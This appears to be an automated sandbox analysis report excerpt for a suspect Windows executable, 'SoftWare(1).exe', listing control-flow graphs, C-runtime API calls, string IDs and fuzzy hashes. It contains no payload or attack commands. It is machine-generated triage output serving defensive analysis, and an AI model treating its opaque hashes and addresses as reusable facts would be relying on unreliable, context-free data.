                                                                                      control_flow_graph 1767 6cf628fa-6cf62925 call 6cf63449 1770 6cf6292b-6cf6292e 1767->1770 1771 6cf62c99-6cf62c9e call 6cf6476a 1767->1771 1770->1771 1772 6cf62934-6cf6293d 1770->1772 1774 6cf62943-6cf62947 1772->1774 1775 6cf62a3a-6cf62a40 1772->1775 1774->1775 1777 6cf6294d-6cf62954 1774->1777 1778 6cf62a48-6cf62a56 1775->1778 1779 6cf62956-6cf6295d 1777->1779 1780 6cf6296c-6cf62971 1777->1780 1781 6cf62c02-6cf62c05 1778->1781 1782 6cf62a5c-6cf62a60 1778->1782 1779->1780 1783 6cf6295f-6cf62966 1779->1783 1780->1775 1784 6cf62977-6cf6297f call 6cf61f3e 1780->1784 1785 6cf62c07-6cf62c0a 1781->1785 1786 6cf62c28-6cf62c31 call 6cf61f3e 1781->1786 1782->1781 1787 6cf62a66-6cf62a6d 1782->1787 1783->1775 1783->1780 1801 6cf62985-6cf6299e call 6cf61f3e * 2 1784->1801 1802 6cf62c33-6cf62c37 1784->1802 1785->1771 1789 6cf62c10-6cf62c25 call 6cf62c9f 1785->1789 1786->1771 1786->1802 1790 6cf62a85-6cf62a8b 1787->1790 1791 6cf62a6f-6cf62a76 1787->1791 1789->1786 1796 6cf62ba2-6cf62ba6 1790->1796 1797 6cf62a91-6cf62ab8 call 6cf620d3 1790->1797 1791->1790 1795 6cf62a78-6cf62a7f 1791->1795 1795->1781 1795->1790 1799 6cf62bb2-6cf62bbe 1796->1799 1800 6cf62ba8-6cf62bb1 call 6cf61bae 1796->1800 1797->1796 1809 6cf62abe-6cf62ac1 1797->1809 1799->1786 1806 6cf62bc0-6cf62bca 1799->1806 1800->1799 1801->1771 1829 6cf629a4-6cf629aa 1801->1829 1811 6cf62bcc-6cf62bce 1806->1811 1812 6cf62bd8-6cf62bda 1806->1812 1814 6cf62ac4-6cf62ad9 1809->1814 1811->1786 1815 6cf62bd0-6cf62bd4 1811->1815 1816 6cf62bf1-6cf62bfe call 6cf63318 1812->1816 1817 6cf62bdc-6cf62bef call 6cf61f3e * 2 1812->1817 1819 6cf62b83-6cf62b96 1814->1819 1820 6cf62adf-6cf62ae2 1814->1820 1815->1786 1822 6cf62bd6 1815->1822 1834 6cf62c00 1816->1834 1835 6cf62c5d-6cf62c72 call 6cf61f3e * 2 1816->1835 1841 6cf62c38 call 6cf646d4 1817->1841 1819->1814 1825 6cf62b9c-6cf62b9f 1819->1825 1820->1819 1826 6cf62ae8-6cf62af0 1820->1826 1822->1817 1825->1796 1826->1819 1833 6cf62af6-6cf62b0a 1826->1833 1831 6cf629d6-6cf629de call 6cf61f3e 1829->1831 1832 6cf629ac-6cf629b0 1829->1832 1851 6cf62a42-6cf62a45 1831->1851 1852 6cf629e0-6cf62a00 call 6cf61f3e * 2 call 6cf63318 1831->1852 1832->1831 1837 6cf629b2-6cf629b9 1832->1837 1838 6cf62b0d-6cf62b1e 1833->1838 1834->1786 1864 6cf62c77-6cf62c94 call 6cf622bf call 6cf63218 call 6cf633d5 call 6cf6318f 1835->1864 1865 6cf62c74 1835->1865 1842 6cf629cd-6cf629d0 1837->1842 1843 6cf629bb-6cf629c2 1837->1843 1844 6cf62b44-6cf62b51 1838->1844 1845 6cf62b20-6cf62b31 call 6cf62dd5 1838->1845 1855 6cf62c3d-6cf62c58 call 6cf61bae call 6cf62f89 call 6cf601f4 1841->1855 1842->1771 1842->1831 1843->1842 1849 6cf629c4-6cf629cb 1843->1849 1844->1838 1854 6cf62b53 1844->1854 1861 6cf62b55-6cf62b7d call 6cf6287a 1845->1861 1862 6cf62b33-6cf62b3c 1845->1862 1849->1831 1849->1842 1851->1778 1852->1851 1882 6cf62a02-6cf62a07 1852->1882 1859 6cf62b80 1854->1859 1855->1835 1859->1819 1861->1859 1862->1845 1867 6cf62b3e-6cf62b41 1862->1867 1864->1771 1865->1864 1867->1844 1882->1841 1883 6cf62a0d-6cf62a20 call 6cf62fa1 1882->1883 1883->1855 1888 6cf62a26-6cf62a32 1883->1888 1888->1841 1889 6cf62a38 1888->1889 1889->1883
                                                                                      APIs
                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 6CF62A19
                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 6CF62B27
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 6CF62C79
                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 6CF62C94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 2751267872-393685449
                                                                                      • Opcode ID: 71119f9f92cf84cf4f1c6e8bd3d2b7de4e562fd407fddaaff7bf10a1aba81f17
                                                                                      • Instruction ID: a1ed9aa18c6ae0a9faa7fb42724afab08cd8855404ebe26482dab5dc921e6f60
                                                                                      • Opcode Fuzzy Hash: 71119f9f92cf84cf4f1c6e8bd3d2b7de4e562fd407fddaaff7bf10a1aba81f17
                                                                                      • Instruction Fuzzy Hash: 9EB19A71D0120AEFCF15CFA6C88499EB7B5FF04328B15865AE810ABF12D732DA55CB91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1890 6cf668bf-6cf668cb 1891 6cf6695d-6cf66960 1890->1891 1892 6cf66966 1891->1892 1893 6cf668d0-6cf668e1 1891->1893 1894 6cf66968-6cf6696c 1892->1894 1895 6cf668e3-6cf668e6 1893->1895 1896 6cf668ee-6cf66907 LoadLibraryExW 1893->1896 1897 6cf66986-6cf66988 1895->1897 1898 6cf668ec 1895->1898 1899 6cf6696d-6cf6697d 1896->1899 1900 6cf66909-6cf66912 GetLastError 1896->1900 1897->1894 1902 6cf6695a 1898->1902 1899->1897 1901 6cf6697f-6cf66980 FreeLibrary 1899->1901 1903 6cf66914-6cf66926 call 6cf64893 1900->1903 1904 6cf6694b-6cf66958 1900->1904 1901->1897 1902->1891 1903->1904 1907 6cf66928-6cf6693a call 6cf64893 1903->1907 1904->1902 1907->1904 1910 6cf6693c-6cf66949 LoadLibraryExW 1907->1910 1910->1899 1910->1904
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(00000000,?,6CF669CE,00000000,6CF644C7,00000000,00000000,00000001,?,6CF66B47,00000022,FlsSetValue,6CF6F530,6CF6F538,00000000), ref: 6CF66980
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3664257935-537541572
                                                                                      • Opcode ID: 81939f34158222fa23549c2be7803609c8e9761c28a756a2a9b9226df3ca34df
                                                                                      • Instruction ID: 2c0d296579c37b5a2b4e3c742f9c8d19640cf8e29e6458a6b21cc466608bd191
                                                                                      • Opcode Fuzzy Hash: 81939f34158222fa23549c2be7803609c8e9761c28a756a2a9b9226df3ca34df
                                                                                      • Instruction Fuzzy Hash: 2C21C032E11211ABDB119A678C50B5A7B789B427A8F240621FD66E7E85E630E905C7E0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1911 6cf61f4c-6cf61f53 1912 6cf61f55-6cf61f57 1911->1912 1913 6cf61f58-6cf61f73 GetLastError call 6cf625e3 1911->1913 1916 6cf61f75-6cf61f77 1913->1916 1917 6cf61f8c-6cf61f8e 1913->1917 1918 6cf61fd2-6cf61fdd SetLastError 1916->1918 1919 6cf61f79-6cf61f8a call 6cf6261e 1916->1919 1917->1918 1919->1917 1922 6cf61f90-6cf61fa0 call 6cf64888 1919->1922 1925 6cf61fb4-6cf61fc4 call 6cf6261e 1922->1925 1926 6cf61fa2-6cf61fb2 call 6cf6261e 1922->1926 1932 6cf61fca-6cf61fd1 call 6cf639c3 1925->1932 1926->1925 1931 6cf61fc6-6cf61fc8 1926->1931 1931->1932 1932->1918
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000001,?,6CF61B81,6CF5F458,6CF5EE1F,?,6CF5F057,?,00000001,?,?,00000001,?,6CF72F88,0000000C,6CF5F150), ref: 6CF61F5A
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CF61F68
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CF61F81
                                                                                      • SetLastError.KERNEL32(00000000,6CF5F057,?,00000001,?,?,00000001,?,6CF72F88,0000000C,6CF5F150,?,00000001,?), ref: 6CF61FD3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: 96c21c87ea7a6c1702937477f3e690d6d74a70b6d47eeb55428d11cda132362d
                                                                                      • Instruction ID: e44154cf3247862b19fce376d3da3979a2ea1b87c387b9cecab8630e8d44b86a
                                                                                      • Opcode Fuzzy Hash: 96c21c87ea7a6c1702937477f3e690d6d74a70b6d47eeb55428d11cda132362d
                                                                                      • Instruction Fuzzy Hash: BD01D836B1D2116DA7542577AC886A736B4DB023BC320432AF52497ED1EF62C8156284
                                                                                      Strings
                                                                                      • C:\Users\user\Desktop\SoftWare(1).exe, xrefs: 6CF65B0F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: C:\Users\user\Desktop\SoftWare(1).exe
                                                                                      • API String ID: 0-3098351247
                                                                                      • Opcode ID: 213465e00d306d8f4bd11383dcf93f931283fc27ba923bce912fc7cc50e4e7a2
                                                                                      • Instruction ID: aeeaef46d59792834c99dfe8dc3fc22a36e71258c9392b1a9829aff1c19c732e
                                                                                      • Opcode Fuzzy Hash: 213465e00d306d8f4bd11383dcf93f931283fc27ba923bce912fc7cc50e4e7a2
                                                                                      • Instruction Fuzzy Hash: AE218E31604209AFDB109F77CC90D9BB7B9FF023687145654E928B7E52EB70EC4487A0
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,EFD9974B,00000000,?,00000000,6CF6C252,000000FF,?,6CF63D8F,?,?,6CF63D63,?), ref: 6CF63E2A
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CF63E3C
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,6CF6C252,000000FF,?,6CF63D8F,?,?,6CF63D63,?), ref: 6CF63E5E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 899d046d767860cff087696e4d689415abfc626606c07106151011acc11022ec
                                                                                      • Instruction ID: eb0d01bfe031469b60d5105e58ee9803d24a26d3d4f6d8e5b46182003c6cccc1
                                                                                      • Opcode Fuzzy Hash: 899d046d767860cff087696e4d689415abfc626606c07106151011acc11022ec
                                                                                      • Instruction Fuzzy Hash: 2A01A272A14619ABDF019F52CC08BBFBBB8FB09714F100525F922A3AC0DB759904CB90
                                                                                      APIs
                                                                                      • __alloca_probe_16.LIBCMT ref: 6CF686F9
                                                                                      • __alloca_probe_16.LIBCMT ref: 6CF687C2
                                                                                      • __freea.LIBCMT ref: 6CF68829
                                                                                        • Part of subcall function 6CF65062: RtlAllocateHeap.NTDLL(00000000,6CF6606C,?,?,6CF6606C,00000220,?,00000000,?), ref: 6CF65094
                                                                                      • __freea.LIBCMT ref: 6CF6883C
                                                                                      • __freea.LIBCMT ref: 6CF68849
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1423051803-0
                                                                                      • Opcode ID: 9c5863fe572f9d1edfb6d49e70833e48bee210d8be4dbc99e53069385d051d9d
                                                                                      • Instruction ID: 818d3c4d9edd62f72dd19442fa3a4b015ce552820be785a4844bc0c167fbc5a6
                                                                                      • Opcode Fuzzy Hash: 9c5863fe572f9d1edfb6d49e70833e48bee210d8be4dbc99e53069385d051d9d
                                                                                      • Instruction Fuzzy Hash: 1E519572601206ABEB118E76CC80DEB3AA9EF46758B25052EFD14E7F40EB31DC54C7A0
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CF624D3,00000000,?,00000001,?,?,?,6CF625C2,00000001,FlsFree,6CF6E768,FlsFree), ref: 6CF6252F
                                                                                      • GetLastError.KERNEL32(?,6CF624D3,00000000,?,00000001,?,?,?,6CF625C2,00000001,FlsFree,6CF6E768,FlsFree,00000000,?,6CF62021), ref: 6CF62539
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CF62561
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 3177248105-2084034818
                                                                                      • Opcode ID: 219f126bdb613e42dd1ef43e734c370a3fb41f7b8d2cb6f202db1a3320e4714b
                                                                                      • Instruction ID: 170f6e8a9fe358214928b6e6c2893fe32a9955018a0c60fa05a01c3e2d68b562
                                                                                      • Opcode Fuzzy Hash: 219f126bdb613e42dd1ef43e734c370a3fb41f7b8d2cb6f202db1a3320e4714b
                                                                                      • Instruction Fuzzy Hash: 36E04F31B48204B7EF105F63DC09B583E65BB01B48F244020F95CE8CA5E762D911A684
                                                                                      APIs
                                                                                      • GetConsoleOutputCP.KERNEL32(EFD9974B,00000000,00000000,?), ref: 6CF68DE4
                                                                                        • Part of subcall function 6CF666C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CF6881F,?,00000000,-00000008), ref: 6CF66722
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CF69036
                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CF6907C
                                                                                      • GetLastError.KERNEL32 ref: 6CF6911F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                      • String ID:
                                                                                      • API String ID: 2112829910-0
                                                                                      • Opcode ID: 7fdd1d2097b2824a0a9c54db8409702883f9d09ea1cda8e30d65d2c8d3b663ae
                                                                                      • Instruction ID: bfc708280e82ccf5cedeea9e43cb41436047795351295ef5445c52189f21b841
                                                                                      • Opcode Fuzzy Hash: 7fdd1d2097b2824a0a9c54db8409702883f9d09ea1cda8e30d65d2c8d3b663ae
                                                                                      • Instruction Fuzzy Hash: 50D17D75E04248AFCF05CFA9C880ADEBBB5FF09314F25416AE465EBB41DB31AA45CB50
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer
                                                                                      • String ID:
                                                                                      • API String ID: 1740715915-0
                                                                                      • Opcode ID: 10bd9e1fdcf812b38dd44a5350ec30ca5b61a24e4582ab878202629ba6ed0997
                                                                                      • Instruction ID: a41af311b2c4e60c2711d3d3587237bec6a7fa9c9c50627299dd377deebe382c
                                                                                      • Opcode Fuzzy Hash: 10bd9e1fdcf812b38dd44a5350ec30ca5b61a24e4582ab878202629ba6ed0997
                                                                                      • Instruction Fuzzy Hash: FA51E472A052069FEB158F16D948FAAB7B4FF04318F20462ED81597E90EB33E884C790
                                                                                      APIs
                                                                                        • Part of subcall function 6CF666C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CF6881F,?,00000000,-00000008), ref: 6CF66722
                                                                                      • GetLastError.KERNEL32 ref: 6CF65371
                                                                                      • __dosmaperr.LIBCMT ref: 6CF65378
                                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 6CF653B2
                                                                                      • __dosmaperr.LIBCMT ref: 6CF653B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1913693674-0
                                                                                      • Opcode ID: 24eef70d8f2a70468f66eb454b7813a54ef6ccf4ca29ca3fb88990543b6da0f5
                                                                                      • Instruction ID: 91a357a01591c88f5a4b81d41cfed6ee3b10e47243ec20af9ec11bef158049ed
                                                                                      • Opcode Fuzzy Hash: 24eef70d8f2a70468f66eb454b7813a54ef6ccf4ca29ca3fb88990543b6da0f5
                                                                                      • Instruction Fuzzy Hash: A121C571604309AFD7009F67888195BB7BAEF0576C7248618F829A7E12D770EC448BA0
                                                                                      APIs
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6CF69C45,00000000,00000001,00000000,?,?,6CF69173,?,00000000,00000000), ref: 6CF6A49D
                                                                                      • GetLastError.KERNEL32(?,6CF69C45,00000000,00000001,00000000,?,?,6CF69173,?,00000000,00000000,?,?,?,6CF69716,00000000), ref: 6CF6A4A9
                                                                                        • Part of subcall function 6CF6A46F: CloseHandle.KERNEL32(FFFFFFFE,6CF6A4B9,?,6CF69C45,00000000,00000001,00000000,?,?,6CF69173,?,00000000,00000000,?,?), ref: 6CF6A47F
                                                                                      • ___initconout.LIBCMT ref: 6CF6A4B9
                                                                                        • Part of subcall function 6CF6A431: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CF6A460,6CF69C32,?,?,6CF69173,?,00000000,00000000,?), ref: 6CF6A444
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6CF69C45,00000000,00000001,00000000,?,?,6CF69173,?,00000000,00000000,?), ref: 6CF6A4CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                      • String ID:
                                                                                      • API String ID: 2744216297-0
                                                                                      • Opcode ID: 49fcb4d04753638bda793b71dee855a52680a53ad1eabfe5cce63c7a1b0fef42
                                                                                      • Instruction ID: d63a605951ee78970d59b9683db6baac2918f0bddb0f30265465260931b94c06
                                                                                      • Opcode Fuzzy Hash: 49fcb4d04753638bda793b71dee855a52680a53ad1eabfe5cce63c7a1b0fef42
                                                                                      • Instruction Fuzzy Hash: 29F0C036A10124BBCF521F97CC08A9A7FB6FF093A5B154510FA6896924D732C920EB94
                                                                                      APIs
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6CF619DF
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6CF61A93
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 3480331319-1018135373
                                                                                      • Opcode ID: 0655c44510020d56c77d69d29f2e25d2e7514c0e878528e4c9c849381f0c5617
                                                                                      • Instruction ID: 2f3625cefa6aa61bb1dacfc4a9afe5a50db093cfb28cb612a4e3fd111446a6f4
                                                                                      • Opcode Fuzzy Hash: 0655c44510020d56c77d69d29f2e25d2e7514c0e878528e4c9c849381f0c5617
                                                                                      • Instruction Fuzzy Hash: 66419335A002099FCF04DF6AC880ADE7BB5AF4631CF14C155E8259BF91D732EA19CB91
                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 6CF62CC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: EncodePointer
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2118026453-2084237596
                                                                                      • Opcode ID: 863b73af5dc08a3e5c37e91420a9c043ba40a5c9b7216e30460faf2e39c54f6c
                                                                                      • Instruction ID: 03078a5a0b9ecb8894b363f9f6b088ee74da4f489675817e1d8568705d66ee5e
                                                                                      • Opcode Fuzzy Hash: 863b73af5dc08a3e5c37e91420a9c043ba40a5c9b7216e30460faf2e39c54f6c
                                                                                      • Instruction Fuzzy Hash: 3B416871A00209AFCF01CF95CC84BEEBBB5FF48308F248159F91467A65D3369951DB51

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.1%
                                                                                      Dynamic/Decrypted Code Coverage:100%
